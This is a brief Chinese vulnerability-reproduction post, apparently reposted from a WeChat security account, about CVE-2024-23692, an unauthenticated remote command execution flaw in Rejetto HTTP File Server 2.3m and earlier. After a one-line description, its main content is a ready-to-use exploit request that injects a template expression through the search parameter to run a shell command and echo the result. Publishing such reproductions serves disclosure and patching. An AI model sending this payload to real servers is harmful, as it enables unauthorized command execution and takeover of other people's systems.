Rejetto HTTP File Server(Rejetto HFS)是Rejetto公司的一款 HTTP 文件服务器。Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。
Rejetto HFS search接口存在RCE命令执行漏洞。
03 测绘查询-系统指纹
04 漏洞复现
/?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
原文始发于微信公众号(安羽安全):【漏洞复现】Rejetto HTTP File Server 文件服务器未经身份验证RCE(CVE-2024-23692)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论